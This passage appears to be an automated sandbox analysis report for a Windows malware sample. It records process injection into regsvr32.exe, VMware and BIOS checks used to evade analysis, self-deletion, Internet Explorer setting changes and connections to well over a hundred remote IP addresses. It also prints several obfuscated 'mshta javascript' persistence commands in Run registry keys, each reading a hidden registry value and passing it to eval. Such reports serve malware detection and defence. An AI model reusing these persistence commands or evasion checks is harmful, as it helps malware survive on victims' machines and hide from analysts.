Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:i7fjkr2rWi=\"5VT\";So1=new%20ActiveXObject(\"WScript.Shell\");bIgQKJ8eX=\"1UOfpXb6pB\";SC4QN=So1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");H7jt8JMI=\"Q\";eval(SC4QN);s0JRHGQ1DM=\"MaJB7f\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:gVBzPC8l=\"Vawth\";yT11=new%20ActiveXObject(\"WScript.Shell\");gP23NQsA=\"p9y87zK80\";b5h6ql=yT11.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");vNx3vRnpq=\"9aKJ\";eval(b5h6ql);jqZ5jVB=\"1x\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:OzRp1nz1=\"9S3Bnqmv\";L0a0=new%20ActiveXObject(\"WScript.Shell\");kpENt7e5=\"XyPes47t\";hPiB2=L0a0.RegRead(\"HKCU\\\\software\\\\0ce5cf04e2\\\\48becf64\");F5oaYzgX=\"DzW5fspL\";eval(hPiB2);qb0sduud=\"Hu8XuLIVCi\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4144 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4144 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4440 wrote to memory of 4432 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4440 wrote to memory of 4432 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4440 wrote to memory of 4432 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 1920 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 1920 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 1920 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 3068 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 3068 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4432 wrote to memory of 3068 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\774750e7081bfd239833590441172f7e_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4320,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 208.62.68.54:8080 tcp
US 206.136.120.169:80 tcp
CN 118.225.91.180:80 tcp
US 170.65.173.103:80 tcp
TW 140.122.198.157:80 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
KR 1.230.180.13:80 tcp
US 155.190.106.145:443 tcp
IE 86.47.105.178:80 tcp
GB 151.228.197.137:8080 tcp
IN 42.108.151.255:80 tcp
US 73.185.77.194:80 tcp
FR 82.228.242.254:443 tcp
ES 85.136.8.232:80 tcp
IM 195.10.96.134:80 tcp
CN 125.44.30.164:80 tcp
JP 60.142.199.126:80 tcp
CN 122.72.63.233:80 tcp
MU 102.201.184.139:80 tcp
TR 188.38.238.221:443 tcp
US 69.2.88.172:443 tcp
IR 2.144.249.150:80 tcp
MX 177.227.51.220:80 tcp
DE 35.157.235.243:80 tcp
IT 188.10.77.82:80 tcp
AU 128.184.73.157:80 tcp
SG 18.142.1.139:80 tcp
DE 165.250.169.48:80 tcp
US 64.140.11.60:8080 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
TW 163.21.84.128:80 tcp
US 52.165.168.237:80 tcp
US 215.247.225.85:80 tcp
US 71.218.200.214:80 tcp
IT 85.42.81.34:443 tcp
US 161.33.205.124:443 tcp
US 72.79.26.185:80 tcp
DE 37.123.105.142:80 tcp
US 149.17.109.157:80 tcp
CN 123.96.121.7:80 tcp
KW 212.43.8.45:80 tcp
CN 210.32.184.222:80 tcp
JP 153.238.41.46:80 tcp
N/A 127.141.33.64:80 tcp
CZ 45.129.27.206:80 tcp
RU 37.143.21.232:80 tcp
US 140.88.236.69:80 tcp
DE 53.190.130.19:80 tcp
FR 77.143.249.103:80 tcp
US 83.147.32.130:80 tcp
IT 87.2.227.156:80 tcp
US 23.232.124.21:80 tcp
BR 179.104.220.82:443 tcp
US 56.152.108.98:80 tcp
DE 92.204.89.47:80 tcp
US 73.143.52.158:8080 tcp
AU 115.131.28.105:80 tcp
AR 181.5.250.32:80 tcp
JP 125.9.192.84:80 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 23.31.229.111:80 tcp
GB 46.101.11.30:80 tcp
ES 37.132.226.121:80 tcp
GB 46.101.11.30:80 46.101.11.30 tcp
US 8.8.8.8:53 30.11.101.46.in-addr.arpa udp
US 9.191.112.5:443 tcp
US 74.38.217.97:80 tcp
DE 85.213.199.239:80 tcp
US 8.7.22.30:80 tcp
CN 36.49.45.37:80 tcp
MA 196.206.12.21:80 tcp
NL 145.193.87.187:80 tcp
BR 179.245.149.31:80 tcp
US 6.23.87.1:80 tcp
CH 137.62.208.144:80 tcp
GH 154.166.91.173:8080 tcp
JP 219.126.215.244:80 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
FR 37.165.208.219:80 tcp
US 15.115.89.197:443 tcp
US 45.16.200.27:80 tcp
US 161.39.74.190:443 tcp
TH 58.136.228.232:80 tcp
US 50.144.194.216:80 tcp
SE 144.27.120.156:80 tcp
US 73.195.227.162:80 tcp
US 66.102.249.76:80 tcp
US 76.193.179.112:80 tcp
US 215.132.183.182:80 tcp
CA 3.97.19.129:80 tcp
DE 62.158.65.90:80 tcp
BR 179.222.173.241:80 tcp
GB 81.102.217.165:8080 tcp
JP 202.221.111.88:80 tcp
TH 203.158.202.87:80 tcp
US 184.205.168.106:80 tcp
PL 217.173.11.103:80 tcp
NL 5.35.172.115:443 tcp
DE 83.119.66.224:80 tcp
NP 49.126.49.49:80 tcp
US 8.8.8.8:53 115.172.35.5.in-addr.arpa udp
US 147.129.111.197:80 tcp
US 30.252.221.60:80 tcp
FR 176.165.31.19:80 tcp
ZA 105.184.45.46:80 tcp
US 107.91.218.74:80 tcp
KR 211.114.236.101:80 tcp
DE 141.38.23.109:80 tcp
US 165.163.27.120:80 tcp
US 54.147.198.138:80 tcp
JP 106.181.234.3:80 tcp
JP 158.204.77.40:80 tcp
US 8.8.8.8:53 138.198.147.54.in-addr.arpa udp
US 3.219.137.152:80 tcp
US 128.167.177.219:80 tcp
US 17.186.231.179:80 tcp
JP 144.1.18.239:80 tcp
CN 220.242.218.200:80 tcp
US 26.7.68.92:80 tcp
CN 42.179.38.173:80 tcp
US 55.144.197.75:80 tcp
FR 82.67.61.95:80 tcp
US 151.106.184.252:80 tcp
DE 53.212.26.64:80 tcp
PL 213.76.132.120:80 tcp
JP 125.14.81.221:80 tcp
GB 25.159.94.22:80 tcp
US 68.216.44.75:80 tcp
CN 183.92.210.159:8080 tcp
BR 177.21.44.121:80 tcp
GB 46.101.11.30:80 46.101.11.30 tcp
FR 77.143.162.253:80 tcp
US 141.123.40.210:80 tcp
US 33.33.160.112:80 tcp
RO 84.247.120.151:80 tcp
KR 125.131.239.154:8080 tcp
KR 110.165.111.82:80 tcp
IL 132.69.246.36:80 tcp
DE 47.69.68.80:80 tcp
JP 122.215.25.49:80 tcp
DE 87.193.114.155:80 tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
NL 160.79.117.107:80 tcp
US 8.6.168.88:80 tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 67.230.99.238:443 tcp
US 19.20.216.92:80 tcp
US 76.29.248.78:80 tcp
US 70.33.155.87:80 tcp
IE 185.108.130.93:80 tcp
US 152.183.170.1:80 tcp
DK 93.164.146.156:80 tcp
US 151.165.135.163:443 tcp
US 6.166.188.12:80 tcp
US 11.42.89.217:80 tcp
FR 90.46.48.145:80 tcp
BR 177.140.177.253:80 tcp
US 134.187.210.96:80 tcp
BR 206.43.190.197:80 tcp
US 67.36.210.80:80 tcp
US 100.189.96.105:80 tcp
US 38.14.10.175:80 tcp
BR 186.214.83.146:80 tcp
US 97.48.78.154:80 tcp
US 215.156.224.234:80 tcp
CN 58.67.71.126:80 tcp
US 216.172.155.106:80 tcp
US 26.184.165.57:443 tcp
DE 83.236.222.15:80 tcp
US 147.85.145.78:80 tcp
JP 220.34.235.2:443 tcp
PY 186.2.217.160:80 tcp
US 26.111.67.161:80 tcp
US 147.116.5.216:80 tcp
HK 154.18.158.226:80 tcp
US 24.93.138.86:80 tcp
SG 43.96.14.24:80 tcp
US 19.22.152.23:80 tcp
BR 189.118.77.111:80 tcp
JP 27.92.59.251:80 tcp
PL 78.152.12.18:80 tcp
GR 46.103.218.91:8080 tcp
HK 1.65.58.165:80 tcp
JP 150.16.49.57:80 tcp
US 52.162.192.153:80 tcp
IT 2.227.115.181:8080 tcp
US 72.172.145.25:80 tcp
US 166.78.158.27:80 tcp
US 54.105.223.4:80 tcp
CH 159.168.151.251:80 tcp
US 206.27.193.115:80 tcp
CN 119.141.193.109:80 tcp
FR 79.82.123.192:80 tcp
TW 210.66.121.89:80 tcp
US 156.88.19.48:80 tcp
RU 79.137.144.151:80 tcp
GB 46.101.11.30:80 46.101.11.30 tcp
TW 163.26.33.196:80 tcp
CA 72.11.182.34:80 tcp
US 146.163.89.123:80 tcp
FR 51.210.96.63:80 tcp
CR 201.237.60.210:8080 tcp
US 30.255.191.192:80 tcp
US 64.150.184.229:8080 tcp

Files

memory/4144-0-0x00000000024A0000-0x0000000002510000-memory.dmp

memory/4144-1-0x0000000002380000-0x0000000002381000-memory.dmp

memory/4144-2-0x00000000024A0000-0x0000000002510000-memory.dmp

memory/4144-3-0x0000000000400000-0x000000000048C000-memory.dmp

memory/4144-5-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4144-8-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4144-9-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4144-7-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4144-6-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4144-10-0x0000000002FB0000-0x000000000307C000-memory.dmp

memory/4440-15-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4144-17-0x0000000000400000-0x000000000048C000-memory.dmp

memory/4440-18-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4440-20-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4440-21-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4440-25-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4440-24-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4440-23-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4440-22-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4432-31-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4440-26-0x0000000001020000-0x00000000010EC000-memory.dmp

memory/4432-36-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4432-34-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/4432-37-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-41-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-42-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-40-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-39-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-38-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-43-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-44-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-48-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-49-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-51-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-47-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-46-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-45-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-50-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/1920-55-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/1920-53-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/1920-52-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/1920-56-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/1920-58-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/1920-61-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/1920-59-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/1920-57-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/1920-60-0x0000000001030000-0x00000000010FC000-memory.dmp

memory/4432-62-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/4432-63-0x0000000001220000-0x00000000012EC000-memory.dmp

memory/3068-64-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/3068-65-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/3068-67-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

memory/3068-68-0x0000000000B00000-0x0000000000BCC000-memory.dmp